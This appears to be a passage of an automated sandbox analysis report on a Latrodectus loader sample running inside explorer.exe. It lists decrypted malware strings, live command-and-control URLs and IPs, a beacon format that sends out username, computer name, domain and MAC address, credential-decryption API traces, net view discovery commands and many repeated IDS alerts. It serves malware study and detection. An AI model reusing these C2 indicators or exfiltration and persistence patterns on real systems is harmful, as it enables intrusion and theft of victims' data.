            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &wmic=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &net_config_ws=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &net_wmic_av=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &whoami_group=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "pid":
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "%d",
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "proc":
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "%s",
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "subproc": [
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &proclist=[
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "pid":
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "%d",
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "proc":
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "%s",
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "subproc": [
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &desklinks=[
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: *.*
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "%s"
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Update_%x
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Custom_update
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: .dll
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: .exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Error
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: runnung
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %s/%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: front
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /files/
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Lambda
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Cookie:
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: POST
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: GET
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: curl/7.88.1
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: CLEARURL
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: URLS
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: COMMAND
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: ERROR
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: aPQLnCcYDT5xeVCxMvCCPmDCealRt4Sb1tyrV5j5ovSSvsA5cZQIJDlIqsBkNLFA
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: counter=%d&type=%d&guid=%s&os=%d&arch=%d&username=%s&group=%lu&ver=%d.%d&up=%d&direction=%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: [{"data":"
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: "}]
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &dpost=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: https://proliforetka.com/test/
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: https://dogirafer.com/test/
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: \*.dll
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: AppData
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Desktop
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Startup
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Personal
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Local AppData
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: <html>
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: <!DOCTYPE
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %s%d.dll
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s,%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Content-Length: 0
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\WINDOWS\SYSTEM32\rundll32.exe %s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Content-Type: application/dns-message
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: Content-Type: application/ocsp-request
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: 12345
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: 12345
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &stiller=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %s%d.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %x%x
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &mac=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %02x
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: :%02x
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &computername=%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &domain=%s
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: LogonTrigger
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %04X%04X%04X%04X%08X%04X
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: \Registry\Machine\
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: TimeTrigger
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: PT0H%02dM
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: %04d-%02d-%02dT%02d:%02d:%02d
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: PT0S
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: \update_data.dat
            Source: C:\Windows\explorer.exeCode function: 7_2_0B845E5C StrStrIA,StrChrA,CryptUnprotectData,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LocalFree,GetProcessHeap,HeapFree,7_2_0B845E5C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B845FE4 CryptUnprotectData,7_2_0B845FE4
            Source: C:\Windows\explorer.exeCode function: 7_2_0B846078 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGetProperty,BCryptGetProperty,BCryptGenerateSymmetricKey,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,BCryptDecrypt,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,BCryptCloseAlgorithmProvider,GetProcessHeap,HeapFree,7_2_0B846078
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8E5528 BCryptGetProperty,BCryptSetProperty,BCryptOpenAlgorithmProvider,BCryptCloseAlgorithmProvider,7_2_0B8E5528
            Source: C:\Windows\explorer.exeCode function: 7_2_0B84453C lstrcpyA,lstrcatA,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,lstrcpyW,RegQueryValueExW,CryptUnprotectData,LocalFree,RegCloseKey,RegEnumKeyExA,RegCloseKey,7_2_0B84453C
            Source: C:\Windows\explorer.exeCode function: 7_2_0B848568 lstrlenW,CryptAcquireContextA,CryptCreateHash,lstrlenW,CryptHashData,CryptGetHashParam,wsprintfA,lstrcatA,wsprintfA,lstrcatA,CryptDestroyHash,CryptReleaseContext,RegQueryValueExA,lstrlenW,CryptUnprotectData,LocalFree,7_2_0B848568
            Source: unknownHTTPS traffic detected: 172.67.161.60:443 -> 192.168.2.6:49935 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49959 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49978 version: TLS 1.2
            Source: Binary string: C:\dvs\p4\build\sw\rel\gfclient\rel_03&3!ZxZQ9rbTQA!n8N>7T3de\GfeXCode\win7_amd64_release\GfeXCode64.pdb source: rundll32.exe, 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmp, appgpuset.dll.2.dr
            Source: Binary string: de\GfeXCode\win7_amd64_release\GfeXCode64.pdb source: rundll32.exe, 00000004.00000002.4602385661.00007FFD9306A000.00000002.00000001.01000000.00000003.sdmp, appgpuset.dll.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.dr
            Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: lavita.msi, MSIC3DE.tmp.2.dr, 42c1d8.msi.2.dr, MSIC2F1.tmp.2.dr, MSIC39F.tmp.2.dr, MSIC35F.tmp.2.dr

            Spreading

            barindex
            Performs a network lookup / discovery via net view
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domain
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /all /domainJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view /allJump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
            Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00007FFD92DB56A0 FindFirstFileExW,4_2_00007FFD92DB56A0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F2A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,7_2_02F2A8E0
            Source: C:\Windows\explorer.exeCode function: 7_2_02F22B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_02F22B28
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8416F4 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_0B8416F4
            Source: C:\Windows\explorer.exeCode function: 7_2_0B846604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,7_2_0B846604
            Source: C:\Windows\explorer.exeCode function: 7_2_0B8E50D8 FindFirstFileA,7_2_0B8E50D8

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49959 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49942 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49935 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.6:49978 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.6:49989 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49998 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2018052 - Severity 1 - ET MALWARE Zbot Generic URI/Header Struct .bin : 192.168.2.6:49965 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50002 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50008 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50006 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50009 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50019 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50017 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50012 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50022 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50018 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50015 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50000 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50020 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50001 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50043 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50046 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50042 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50025 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50032 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50038 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49947 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50048 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50004 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50005 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50024 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:49999 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50031 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50041 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50010 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50047 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50029 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50026 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50027 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50035 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50044 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50021 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50023 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50013 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50030 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50036 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50034 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50014 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50016 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50040 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50039 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50045 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2048735 - Severity 1 - ET MALWARE Latrodectus Loader Related Activity (POST) : 192.168.2.6:50037 -> 172.67.161.60:443
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 104.21.16.1 443Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.46.11 8817Jump to behavior
            Source: C:\Windows\System32\rundll32.exeNetwork Connect: 94.232.40.41 8817Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 172.67.161.60 443Jump to behavior
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://proliforetka.com/test/
            Source: Malware configuration extractorURLs: https://dogirafer.com/test/
            Source: global trafficTCP traffic: 192.168.2.6:49709 -> 94.232.46.11:8817
            Source: global trafficTCP traffic: 192.168.2.6:49843 -> 94.232.40.41:8817
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49942 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49959 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49989 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49947 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49965 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49998 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50004 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50002 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50010 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50015 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50006 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50003 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50022 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50017 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50021 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50009 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50018 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50026 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50030 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50038 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50025 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50032 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50014 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50008 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50027 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50029 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50045 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50044 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50043 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50016 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50020 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50040 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50048 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50023 -> 172.67.161.60:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50000 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:50031 -> 172.67.161.60:443
